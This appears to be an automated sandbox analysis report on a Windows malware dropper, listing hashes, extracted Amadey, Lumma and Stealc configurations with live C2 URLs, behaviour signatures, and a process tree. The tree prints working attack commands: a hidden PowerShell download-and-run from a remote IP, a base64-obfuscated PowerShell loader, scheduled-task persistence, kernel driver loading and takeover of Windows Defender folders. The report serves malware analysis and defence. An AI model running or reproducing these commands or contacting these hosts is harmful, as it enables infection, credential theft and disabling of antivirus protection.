Analysis

  • max time kernel
    149s
  • max time network
    148s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    29/03/2025, 08:30

General

  • Target

    2025-03-29_3563a8e325a1094e42df3e36be30699b_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe

  • Size

    938KB

  • MD5

    3563a8e325a1094e42df3e36be30699b

  • SHA1

    f1aed8a155e5401a4a03510a448572f9cace7ad2

  • SHA256

    55c2360e208a57c446ad972c638de1a18ef648a2b78eafec6a4857e8f72b6d4c

  • SHA512

    c5ab7632a747ea5d9c471e965740f53240b9678f8b7c0b058cc5cd1b21d31afc4bc3798ecc3b9946c2f4989ecc9b102135637a3ee90ecfefca5c690938b42aab

  • SSDEEP

    24576:oqDEvCTbMWu7rQYlBQcBiT6rprG8a0Ru:oTvC/MTQYxsWR7a0R

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Extracted

Family

lumma

C2

https://esccapewz.run/ANSbwqy

https://travewlio.shop/ZNxbHi

https://touvrlane.bet/ASKwjq

https://sighbtseeing.shop/ASJnzh

https://advennture.top/GKsiio

https://targett.top/dsANGt

https://holidamyup.today/AOzkns

https://mtriplooqp.world/APowko

https://0wxayfarer.live/ALosnz

https://oreheatq.live/gsopp

https://faacastmaxw.run/ganzde

https://weldorae.digital/geds

https://steelixr.live/aguiz

https://qtargett.top/dsANGt

https://smeltingt.run/giiaus

https://ferromny.digital/gwpd

Extracted

Family

stealc

Botnet

trump

C2

http://45.93.20.28

Attributes
  • url_path

    /85a1cacf11314eb8.php

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Detects Healer an antivirus disabler dropper 3 IoCs
  • GCleaner

    GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.

  • Gcleaner family
  • Healer

    Healer an antivirus disabler dropper.

  • Healer family
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs
  • Modifies Windows Defender notification settings 3 TTPs 2 IoCs
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 14 IoCs
  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

    Run Powershell and hide display window.

  • Creates new service(s) 2 TTPs
  • Downloads MZ/PE file 28 IoCs
  • Possible privilege escalation attempt 2 IoCs
  • Stops running service(s) 4 TTPs
  • Checks BIOS information in registry 2 TTPs 28 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 42 IoCs
  • Identifies Wine through registry keys 2 TTPs 14 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 64 IoCs
  • Modifies file permissions 1 TTPs 2 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Windows security modification 2 TTPs 2 IoCs
  • Adds Run key to start application 2 TTPs 8 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • AutoIT Executable 2 IoCs

    AutoIT scripts compiled to PE executables.

  • Enumerates processes with tasklist 1 TTPs 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 14 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Drops file in Program Files directory 46 IoCs
  • Drops file in Windows directory 15 IoCs
  • Launches sc.exe 38 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 2 IoCs
  • Kills process with taskkill 5 IoCs
  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
  • Modifies registry class 1 IoCs
  • Modifies system certificate store 2 TTPs 4 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 18 IoCs
  • Suspicious use of FindShellTrayWindow 26 IoCs
  • Suspicious use of SendNotifyMessage 22 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\2025-03-29_3563a8e325a1094e42df3e36be30699b_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
    "C:\Users\Admin\AppData\Local\Temp\2025-03-29_3563a8e325a1094e42df3e36be30699b_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:1240
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c schtasks /create /tn YQoqlmaio0f /tr "mshta C:\Users\Admin\AppData\Local\Temp\QRWeS8fIr.hta" /sc minute /mo 25 /ru "Admin" /f
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:288
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /create /tn YQoqlmaio0f /tr "mshta C:\Users\Admin\AppData\Local\Temp\QRWeS8fIr.hta" /sc minute /mo 25 /ru "Admin" /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Scheduled Task/Job: Scheduled Task
        PID:3000
    • C:\Windows\SysWOW64\mshta.exe
      mshta C:\Users\Admin\AppData\Local\Temp\QRWeS8fIr.hta
      2⤵
      • System Location Discovery: System Language Discovery
      • Modifies Internet Explorer settings
      • Suspicious use of WriteProcessMemory
      PID:2968
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'GW383Q5QNGDZCNJBRGPANPUOUTCDUXCC.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Downloads MZ/PE file
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2228
        • C:\Users\Admin\AppData\Local\TempGW383Q5QNGDZCNJBRGPANPUOUTCDUXCC.EXE
          "C:\Users\Admin\AppData\Local\TempGW383Q5QNGDZCNJBRGPANPUOUTCDUXCC.EXE"
          4⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Loads dropped DLL
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Drops file in Windows directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of WriteProcessMemory
          PID:2856
          • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
            "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
            5⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Downloads MZ/PE file
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Loads dropped DLL
            • Adds Run key to start application
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:1776
            • C:\Users\Admin\AppData\Local\Temp\10358260101\Rm3cVPI.exe
              "C:\Users\Admin\AppData\Local\Temp\10358260101\Rm3cVPI.exe"
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:2992
            • C:\Users\Admin\AppData\Local\Temp\10362200101\b422135428.exe
              "C:\Users\Admin\AppData\Local\Temp\10362200101\b422135428.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Writes to the Master Boot Record (MBR)
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious behavior: EnumeratesProcesses
              PID:2696
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10364621121\2GF9eeb.cmd"
              6⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:1756
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\10364621121\2GF9eeb.cmd"
                7⤵
                • Suspicious use of WriteProcessMemory
                PID:2296
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiR2bWVhcnAgPSBAJw0KJHVzZXJ4Z3dOYW1lIHhndz0gJGVueGd3djpVU0V4Z3dSTkFNRXhndzskdGlzeGd3ID0gIkN4Z3c6XFVzZXhnd3JzXCR1eGd3c2VyTmF4Z3dtZVxkd3hnd20uYmF0eGd3IjtpZiB4Z3coVGVzdHhndy1QYXRoeGd3ICR0aXN4Z3cpIHsgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiQnhnd2F0Y2ggeGd3ZmlsZSB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dDeWFuO3hndyAgICAkeGd3ZmlsZUx4Z3dpbmVzIHhndz0gW1N5eGd3c3RlbS54Z3dJTy5GaXhnd2xlXTo6eGd3UmVhZEF4Z3dsbExpbnhnd2VzKCR0eGd3aXMsIFt4Z3dTeXN0ZXhnd20uVGV4eGd3dC5FbmN4Z3dvZGluZ3hnd106OlVUeGd3RjgpOyB4Z3cgICBmb3hnd3JlYWNoeGd3ICgkbGl4Z3duZSBpbnhndyAkZmlseGd3ZUxpbmV4Z3dzKSB7IHhndyAgICAgeGd3ICBpZiB4Z3coJGxpbnhnd2UgLW1heGd3dGNoICd4Z3deOjo6IHhndz8oLispeGd3JCcpIHt4Z3cgICAgIHhndyAgICAgeGd3ICBXcml4Z3d0ZS1Ib3hnd3N0ICJJeGd3bmplY3R4Z3dpb24gY3hnd29kZSBkeGd3ZXRlY3R4Z3dlZCBpbnhndyB0aGUgeGd3YmF0Y2h4Z3cgZmlsZXhndy4iIC1GeGd3b3JlZ3J4Z3dvdW5kQ3hnd29sb3IgeGd3Q3lhbjt4Z3cgICAgIHhndyAgICAgeGd3ICB0cnl4Z3cgeyAgIHhndyAgICAgeGd3ICAgICB4Z3cgICAkZHhnd2Vjb2RleGd3ZEJ5dGV4Z3dzID0gW3hnd1N5c3RleGd3bS5Db254Z3d2ZXJ0XXhndzo6RnJveGd3bUJhc2V4Z3c2NFN0cnhnd2luZygkeGd3bWF0Y2h4Z3dlc1sxXXhndy5UcmlteGd3KCkpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3ckaW5qZXhnd2N0aW9ueGd3Q29kZSB4Z3c9IFtTeXhnd3N0ZW0ueGd3VGV4dC54Z3dFbmNvZHhnd2luZ106eGd3OlVuaWN4Z3dvZGUuR3hnd2V0U3RyeGd3aW5nKCR4Z3dkZWNvZHhnd2VkQnl0eGd3ZXMpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3dXcml0ZXhndy1Ib3N0eGd3ICJJbmp4Z3dlY3Rpb3hnd24gY29keGd3ZSBkZWN4Z3dvZGVkIHhnd3N1Y2NleGd3c3NmdWx4Z3dseS4iIHhndy1Gb3JleGd3Z3JvdW54Z3dkQ29sb3hnd3IgR3JleGd3ZW47ICB4Z3cgICAgIHhndyAgICAgeGd3ICAgIFd4Z3dyaXRlLXhnd0hvc3QgeGd3IkV4ZWN4Z3d1dGluZ3hndyBpbmpleGd3Y3Rpb254Z3cgY29kZXhndy4uLiIgeGd3LUZvcmV4Z3dncm91bnhnd2RDb2xveGd3ciBZZWx4Z3dsb3c7IHhndyAgICAgeGd3ICAgICB4Z3cgICAgIHhnd0ludm9reGd3ZS1FeHB4Z3dyZXNzaXhnd29uICRpeGd3bmplY3R4Z3dpb25Db3hnd2RlOyAgeGd3ICAgICB4Z3cgICAgIHhndyAgICBieGd3cmVhazt4Z3cgICAgIHhndyAgICAgeGd3ICB9IGN4Z3dhdGNoIHhnd3sgICAgeGd3ICAgICB4Z3cgICAgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiRXhnd3Jyb3IgeGd3ZHVyaW54Z3dnIGRlY3hnd29kaW5neGd3IG9yIGV4Z3d4ZWN1dHhnd2luZyBpeGd3bmplY3R4Z3dpb24gY3hnd29kZTogeGd3JF8iIC14Z3dGb3JlZ3hnd3JvdW5keGd3Q29sb3J4Z3cgUmVkO3hndyAgICAgeGd3ICAgICB4Z3cgIH07IHhndyAgICAgeGd3ICB9OyB4Z3cgICB9O3hnd30gZWxzeGd3ZSB7ICB4Z3cgICAgV3hnd3JpdGUteGd3SG9zdCB4Z3ciU3lzdHhnd2VtIEVyeGd3cm9yOiB4Z3dCYXRjaHhndyBmaWxleGd3IG5vdCB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dSZWQ7IHhndyAgIGV4eGd3aXQ7fTt4Z3dmdW5jdHhnd2lvbiBweGd3c29nbCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGF4Z3dlc192YXhnd3I9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQWVzeGd3XTo6Q3J4Z3dlYXRlKHhndyk7CSRheGd3ZXNfdmF4Z3dyLk1vZHhnd2U9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQ2lweGd3aGVyTW94Z3dkZV06Onhnd0NCQzsJeGd3JGFlc194Z3d2YXIuUHhnd2FkZGlueGd3Zz1bU3l4Z3dzdGVtLnhnd1NlY3VyeGd3aXR5LkN4Z3dyeXB0b3hnd2dyYXBoeGd3eS5QYWR4Z3dkaW5nTXhnd29kZV06eGd3OlBLQ1N4Z3c3OwkkYXhnd2VzX3ZheGd3ci5LZXl4Z3c9W1N5c3hnd3RlbS5DeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygnVUNEeGd3ZFZ6U3Z4Z3dDMUNvOXhnd1VWb1B1eGd3RXRvVWR4Z3duNzZsQ3hndytPV0tJeGd3OG5qRGV4Z3dxTDZ4MHhndz0nKTsJeGd3JGFlc194Z3d2YXIuSXhnd1Y9W1N5eGd3c3RlbS54Z3dDb252ZXhnd3J0XTo6eGd3RnJvbUJ4Z3dhc2U2NHhnd1N0cmlueGd3ZygnK2F4Z3cvRHp3NHhnd1ZRR1g3eGd3L1J0Y0h4Z3dQQkpWd3hndz09Jyk7eGd3CSRkZWN4Z3dyeXB0b3hnd3JfdmFyeGd3PSRhZXN4Z3dfdmFyLnhnd0NyZWF0eGd3ZURlY3J4Z3d5cHRvcnhndygpOwkkeGd3cmV0dXJ4Z3duX3Zhcnhndz0kZGVjeGd3cnlwdG94Z3dyX3Zhcnhndy5UcmFueGd3c2Zvcm14Z3dGaW5hbHhnd0Jsb2NreGd3KCRwYXJ4Z3dhbV92YXhnd3IsIDAseGd3ICRwYXJ4Z3dhbV92YXhnd3IuTGVueGd3Z3RoKTt4Z3cJJGRlY3hnd3J5cHRveGd3cl92YXJ4Z3cuRGlzcHhnd29zZSgpeGd3OwkkYWV4Z3dzX3Zhcnhndy5EaXNweGd3b3NlKCl4Z3c7CSRyZXhnd3R1cm5feGd3dmFyO314Z3dmdW5jdHhnd2lvbiBzeGd3dGF4cCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGh4Z3dwaGM9Tnhnd2V3LU9ieGd3amVjdCB4Z3dTeXN0ZXhnd20uSU8ueGd3TWVtb3J4Z3d5U3RyZXhnd2FtKCwkeGd3cGFyYW14Z3dfdmFyKXhndzsJJGlzeGd3d2hiPU54Z3dldy1PYnhnd2plY3QgeGd3U3lzdGV4Z3dtLklPLnhnd01lbW9yeGd3eVN0cmV4Z3dhbTsJJHhnd2Zsc2l6eGd3PU5ldy14Z3dPYmplY3hnd3QgU3lzeGd3dGVtLkl4Z3dPLkNvbXhnd3ByZXNzeGd3aW9uLkd4Z3daaXBTdHhnd3JlYW0oeGd3JGhwaGN4Z3csIFtJT3hndy5Db21weGd3cmVzc2l4Z3dvbi5Db3hnd21wcmVzeGd3c2lvbk14Z3dvZGVdOnhndzpEZWNveGd3bXByZXN4Z3dzKTsJJHhnd2Zsc2l6eGd3LkNvcHl4Z3dUbygkaXhnd3N3aGIpeGd3OwkkZmx4Z3dzaXouRHhnd2lzcG9zeGd3ZSgpOwl4Z3ckaHBoY3hndy5EaXNweGd3b3NlKCl4Z3c7CSRpc3hnd3doYi5EeGd3aXNwb3N4Z3dlKCk7CXhndyRpc3doeGd3Yi5Ub0F4Z3dycmF5KHhndyk7fWZ1eGd3bmN0aW94Z3duIGhlenhnd2d4KCRweGd3YXJhbV94Z3d2YXIsJHhnd3BhcmFteGd3Ml92YXJ4Z3cpewkkbnhnd3g9W1N5eGd3c3RlbS54Z3dSZWZsZXhnd2N0aW9ueGd3LkFzc2V4Z3dtYmx5XXhndzo6KCdkeGd3YW9MJ1t4Z3ctMS4uLXhndzRdIC1qeGd3b2luICd4Z3cnKShbYnhnd3l0ZVtdeGd3XSRwYXJ4Z3dhbV92YXhnd3IpOwkkeGd3bGF6PSR4Z3dueC5Fbnhnd3RyeVBveGd3aW50Owl4Z3ckbGF6Lnhnd0ludm9reGd3ZSgkbnV4Z3dsbCwgJHhnd3BhcmFteGd3Ml92YXJ4Z3cpO30kaHhnd29zdC5VeGd3SS5SYXd4Z3dVSS5XaXhnd25kb3dUeGd3aXRsZSB4Z3c9ICR0aXhnd3M7JGxveGd3Zj1bU3l4Z3dzdGVtLnhnd0lPLkZpeGd3bGVdOjp4Z3coJ3R4ZXhnd1RsbEFkeGd3YWVSJ1t4Z3ctMS4uLXhndzExXSAteGd3am9pbiB4Z3cnJykoJHhnd3RpcykueGd3U3BsaXR4Z3coW0Vudnhnd2lyb25teGd3ZW50XTp4Z3c6TmV3THhnd2luZSk7eGd3Zm9yZWF4Z3djaCAoJHhnd3pwamxweGd3IGluICR4Z3dsb2YpIHhnd3sJaWYgeGd3KCR6cGp4Z3dscC5TdHhnd2FydHNXeGd3aXRoKCd4Z3c6OiAnKXhndykJewkJeGd3JGdxYnN4Z3c9JHpwanhnd2xwLlN1eGd3YnN0cml4Z3duZygzKXhndzsJCWJyeGd3ZWFrOwl4Z3d9fSRpdXhnd3A9W3N0eGd3cmluZ1t4Z3ddXSRncXhnd2JzLlNweGd3bGl0KCd4Z3dcJyk7JHhnd25sdD1zeGd3dGF4cCB4Z3cocHNvZ3hnd2wgKFtDeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygkaXVweGd3WzBdKSl4Z3cpOyRqZXhnd2J0PXN0eGd3YXhwICh4Z3dwc29nbHhndyAoW0NveGd3bnZlcnR4Z3ddOjpGcnhnd29tQmFzeGd3ZTY0U3R4Z3dyaW5nKHhndyRpdXBbeGd3MV0pKSl4Z3c7aGV6Z3hnd3ggJG5seGd3dCAkbnV4Z3dsbDtoZXhnd3pneCAkeGd3amVidCB4Z3coLFtzdHhnd3JpbmdbeGd3XV0gKCd4Z3clKicpKXhndzsNCidADQoNCiRybGpmcnAgPSAkdm1lYXJwIC1yZXBsYWNlICd4Z3cnLCAnJw0KDQpJbnZva2UtRXhwcmVzc2lvbiAkcmxqZnJwDQo=')) | Invoke-Expression"
                  8⤵
                  • Command and Scripting Interpreter: PowerShell
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1620
            • C:\Users\Admin\AppData\Local\Temp\10366310101\amnew.exe
              "C:\Users\Admin\AppData\Local\Temp\10366310101\amnew.exe"
              6⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Drops file in Windows directory
              • System Location Discovery: System Language Discovery
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of WriteProcessMemory
              PID:1532
              • C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
                "C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"
                7⤵
                • Downloads MZ/PE file
                • Executes dropped EXE
                • Loads dropped DLL
                • Adds Run key to start application
                • System Location Discovery: System Language Discovery
                • Modifies system certificate store
                PID:2448
                • C:\Users\Admin\AppData\Local\Temp\10001960101\gron12321.exe
                  "C:\Users\Admin\AppData\Local\Temp\10001960101\gron12321.exe"
                  8⤵
                  • Executes dropped EXE
                  PID:2708
                  • C:\Windows\system32\WerFault.exe
                    C:\Windows\system32\WerFault.exe -u -p 2708 -s 36
                    9⤵
                    • Loads dropped DLL
                    PID:3008
                • C:\Users\Admin\AppData\Local\Temp\10026630101\v7942.exe
                  "C:\Users\Admin\AppData\Local\Temp\10026630101\v7942.exe"
                  8⤵
                  • Executes dropped EXE
                  PID:440
                  • C:\Windows\system32\WerFault.exe
                    C:\Windows\system32\WerFault.exe -u -p 440 -s 44
                    9⤵
                    • Loads dropped DLL
                    PID:464
                • C:\Users\Admin\AppData\Local\Temp\10028410101\alex1dskfmdsf.exe
                  "C:\Users\Admin\AppData\Local\Temp\10028410101\alex1dskfmdsf.exe"
                  8⤵
                  • Executes dropped EXE
                  PID:848
                  • C:\Windows\system32\WerFault.exe
                    C:\Windows\system32\WerFault.exe -u -p 848 -s 36
                    9⤵
                    • Loads dropped DLL
                    PID:1336
                • C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe
                  "C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe"
                  8⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • System Location Discovery: System Language Discovery
                  PID:2788
                  • C:\Users\Admin\AppData\Local\Temp\is-LEJLK.tmp\Bell_Setup16.tmp
                    "C:\Users\Admin\AppData\Local\Temp\is-LEJLK.tmp\Bell_Setup16.tmp" /SL5="$12015A,1695194,421888,C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe"
                    9⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    PID:2596
                    • C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe
                      "C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe" /VERYSILENT
                      10⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • System Location Discovery: System Language Discovery
                      PID:2080
                      • C:\Users\Admin\AppData\Local\Temp\is-OIV14.tmp\Bell_Setup16.tmp
                        "C:\Users\Admin\AppData\Local\Temp\is-OIV14.tmp\Bell_Setup16.tmp" /SL5="$13015A,1695194,421888,C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe" /VERYSILENT
                        11⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • System Location Discovery: System Language Discovery
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of FindShellTrayWindow
                        PID:2204
                        • C:\Windows\SysWOW64\regsvr32.exe
                          "regsvr32.exe" /s /i:INSTALL "C:\Users\Admin\AppData\Roaming\\1wlanapi.ocx"
                          12⤵
                          • Loads dropped DLL
                          • System Location Discovery: System Language Discovery
                          PID:3012
                • C:\Users\Admin\AppData\Local\Temp\10042990101\bot.exe
                  "C:\Users\Admin\AppData\Local\Temp\10042990101\bot.exe"
                  8⤵
                  • Executes dropped EXE
                  PID:272
                • C:\Users\Admin\AppData\Local\Temp\10043020101\jokererer.exe
                  "C:\Users\Admin\AppData\Local\Temp\10043020101\jokererer.exe"
                  8⤵
                  • Executes dropped EXE
                  PID:1716
                  • C:\Windows\system32\WerFault.exe
                    C:\Windows\system32\WerFault.exe -u -p 1716 -s 28
                    9⤵
                    • Loads dropped DLL
                    PID:604
                • C:\Users\Admin\AppData\Local\Temp\10043750101\21572c0b2a.exe
                  "C:\Users\Admin\AppData\Local\Temp\10043750101\21572c0b2a.exe"
                  8⤵
                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                  • Checks BIOS information in registry
                  • Executes dropped EXE
                  • Identifies Wine through registry keys
                  • Loads dropped DLL
                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                  • Suspicious use of SetThreadContext
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  PID:3620
                  • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
                    "C:\Users\Admin\AppData\Local\Temp\10043750101\21572c0b2a.exe"
                    9⤵
                    • Downloads MZ/PE file
                    • Executes dropped EXE
                    • System Location Discovery: System Language Discovery
                    PID:3768
                • C:\Users\Admin\AppData\Local\Temp\10043760101\fb26e2dee5.exe
                  "C:\Users\Admin\AppData\Local\Temp\10043760101\fb26e2dee5.exe"
                  8⤵
                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                  • Checks BIOS information in registry
                  • Executes dropped EXE
                  • Identifies Wine through registry keys
                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                  • Suspicious use of SetThreadContext
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  PID:3260
                  • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
                    "C:\Users\Admin\AppData\Local\Temp\10043760101\fb26e2dee5.exe"
                    9⤵
                    • Downloads MZ/PE file
                    • Executes dropped EXE
                    • System Location Discovery: System Language Discovery
                    PID:3392
            • C:\Users\Admin\AppData\Local\Temp\10367460101\apple.exe
              "C:\Users\Admin\AppData\Local\Temp\10367460101\apple.exe"
              6⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:2780
              • C:\Users\Admin\AppData\Local\Temp\22.exe
                "C:\Users\Admin\AppData\Local\Temp\22.exe"
                7⤵
                • Executes dropped EXE
                • Suspicious use of WriteProcessMemory
                PID:2816
                • C:\Windows\system32\cmd.exe
                  "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\7639.tmp\763A.tmp\763B.bat C:\Users\Admin\AppData\Local\Temp\22.exe"
                  8⤵
                    PID:2456
                    • C:\Users\Admin\AppData\Local\Temp\22.exe
                      "C:\Users\Admin\AppData\Local\Temp\22.exe" go
                      9⤵
                      • Executes dropped EXE
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: CmdExeWriteProcessMemorySpam
                      PID:2916
                      • C:\Windows\system32\cmd.exe
                        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\7668.tmp\7669.tmp\766A.bat C:\Users\Admin\AppData\Local\Temp\22.exe go"
                        10⤵
                        • Drops file in Program Files directory
                        PID:2764
                        • C:\Windows\system32\sc.exe
                          sc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"
                          11⤵
                          • Launches sc.exe
                          PID:2592
                        • C:\Windows\system32\sc.exe
                          sc start ddrver
                          11⤵
                          • Launches sc.exe
                          PID:2616
                        • C:\Windows\system32\timeout.exe
                          timeout /t 1
                          11⤵
                          • Delays execution with timeout.exe
                          PID:2648
                        • C:\Windows\system32\sc.exe
                          sc stop ddrver
                          11⤵
                          • Launches sc.exe
                          PID:292
                        • C:\Windows\system32\sc.exe
                          sc start ddrver
                          11⤵
                          • Launches sc.exe
                          PID:1216
                        • C:\Windows\system32\takeown.exe
                          takeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y
                          11⤵
                          • Possible privilege escalation attempt
                          • Modifies file permissions
                          PID:2856
                        • C:\Windows\system32\icacls.exe
                          icacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t
                          11⤵
                          • Possible privilege escalation attempt
                          • Modifies file permissions
                          PID:1952
                        • C:\Windows\system32\sc.exe
